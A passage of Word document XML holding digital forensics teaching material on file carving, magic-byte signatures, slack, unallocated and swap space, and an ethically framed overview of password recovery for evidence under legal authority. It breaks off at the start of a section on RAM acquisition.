          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">■ Carving a JPEG</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rPr>
          <w:cantSplit/>
        </w:trPr>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Scan raw disk data</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Find header FF D8 FF</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Read until footer FF D9</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Save as recovered .jpg</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Verify and hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Common carving tools: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scalpel</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Foremost</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PhotoRec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (also available as an Autopsy module), and the built-in carving in EnCase and FTK. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Limitations:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> fragmented files (stored in separate pieces) are often recovered only partly or wrongly, and overwritten data cannot be recovered.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">File system signatures (magic bytes)</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file signature</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">magic number</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, is a fixed sequence of bytes at the start of a file that identifies its real type, regardless of its name or extension. Carving and file-type detection both depend on it. If a file named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">holiday.jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> actually starts with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">4D 5A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, it is not a picture — it is an executable.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3411"/>
        <w:gridCol w:w="3411"/>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File type</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Header (hex)</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In text form</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JPEG image</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FF D8 FF</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ÿØÿ</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PNG image</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89 50 4E 47 0D 0A 1A 0A</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‰PNG</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GIF image</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47 49 46 38</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GIF8</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PDF document</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25 50 44 46</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%PDF</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ZIP (also DOCX, XLSX, APK)</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50 4B 03 04</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PK</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Windows executable (EXE/DLL)</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4D 5A</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MZ</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Linux executable (ELF)</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7F 45 4C 46</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.ELF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Investigators use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">file signature analysis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to catch renamed files, for example a stolen database renamed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">notes.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Autopsy has a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">File Type Identification</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ingest module for this purpose.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.9 Slack Space, Unallocated Space and Swap Space</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">These are three places that hold evidence which is invisible in normal file browsing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Slack space</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Storage is allocated in fixed-size units called </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">clusters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for example 4 KB). A file uses a whole number of clusters, so the last cluster is usually only partly filled. The unused part between the end of the file and the end of the cluster is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">slack space</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</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rPr>
          <w:cantSplit w:val="false"/>
        </w:trP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 Slack space example (4 KB cluster, 3 KB file)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">|&lt;------------ one 4 KB cluster ------------&gt;|</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">[ 3 KB of file data ............ ][ 1 KB slack ]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">                                  ^ may contain old data from</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">                                    a previously stored file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The slack area can still contain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">leftover pieces of an earlier file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that used the same cluster, or random memory contents. Investigators therefore examine slack space for traces of deleted documents, passwords or text. Criminals may also deliberately hide small amounts of data in slack space.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Unallocated space</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Unallocated space</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is disk space that the file system currently regards as free. After a file is deleted, its clusters join the unallocated space, but the old data stays there until overwritten. It is the main hunting ground for deleted files and fragments, and the main target for carving. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Unallocated does not mean empty.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Swap space (virtual memory)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When RAM is full, the operating system moves less-used data to disk. In Windows this is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">pagefile.sys</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hiberfil.sys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> holds RAM contents during hibernation); in Linux it is a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">swap partition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or swap file. These files can hold fragments of what was once in RAM — passwords, chat messages, parts of documents — even after the system has been switched off. So swap space is a valuable source when RAM itself could not be captured.</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3411"/>
        <w:gridCol w:w="3898"/>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Area</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Contains</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Forensic value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Slack space</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Leftover data after the end of a file within its last cluster</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Traces of older files, hidden data</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Unallocated space</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Free clusters, including data of deleted files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Recover deleted files, carving</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Swap / pagefile / hiberfil</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paged out of RAM to disk</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Memory traces without a live RAM capture</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.10 Password Recovery and Bypass — Overview (Ethical Context)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence is often protected by passwords or encryption: a locked phone, a password-protected ZIP or Office file, an encrypted disk, or a locked user account. Investigators sometimes need to recover access. This must be done </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">only with legal authority</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and the aim is to read the data, not to damage or change it.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is protected</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General (ethical) approaches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Files</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (ZIP, PDF, Office documents)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Ask the owner; try known/likely passwords from the case; use dictionary or brute-force tools </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">on a copy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (e.g. John the Ripper, Hashcat, Passware, Elcomsoft).</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Windows or Linux user account</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Offline analysis of the disk image, where account hashes (SAM/shadow files) can be extracted and tested against wordlists; the original disk is not logged in to.</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Encrypted disk or volume</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (BitLocker, VeraCrypt)</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Look for recovery keys (printed, saved in Microsoft/Azure accounts, AD); capture RAM if the system is running unlocked, since keys can be present in memory; or obtain the password legally.</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Mobile phones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Specialised tools (Cellebrite, Magnet) and vendor support; legal orders to compel the owner or service provider; success depends on model and OS version.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Online accounts / cloud</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Legal requests to the provider; account recovery by the owner; not by guessing passwords.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Always</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> get written authority first. Bypassing protection without it can be an offence (IT Act Sections 43 and 66).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Work on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">copies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the evidence; record every attempt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A live, unlocked device may hold valuable data — avoid locking or restarting it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Some data may be genuinely unrecoverable. Say so in the report; never claim access you do not have.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.11 RAM / Memory Acquisition Basics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Why memory matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">RAM is the working area of a computer. At the time of capture it can contain things that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">never reach the disk</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Running processes, including hidden or injected malware that exists only in memory (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
